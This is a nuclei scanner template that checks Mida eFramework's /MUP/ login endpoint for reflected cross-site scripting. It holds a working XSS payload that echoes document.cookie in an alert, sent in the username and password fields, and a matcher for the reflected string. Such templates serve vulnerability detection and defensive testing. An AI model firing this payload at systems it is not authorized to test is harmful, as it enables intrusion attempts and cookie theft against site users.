nuclei-templates/vulnerabilities/other/mida-eframework-xss.yaml

27 lines
752 B
YAML

id: mida-eframework-xss
info:
name: Mida eFramework - Cross Site Scripting
author: pikpikcu
severity: medium
requests:
- raw:
- |
POST /MUP/ HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/x-www-form-urlencoded
Referer: {{Hostname}}/MUP
UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"><script>javascript:alert(document.cookie)</script>'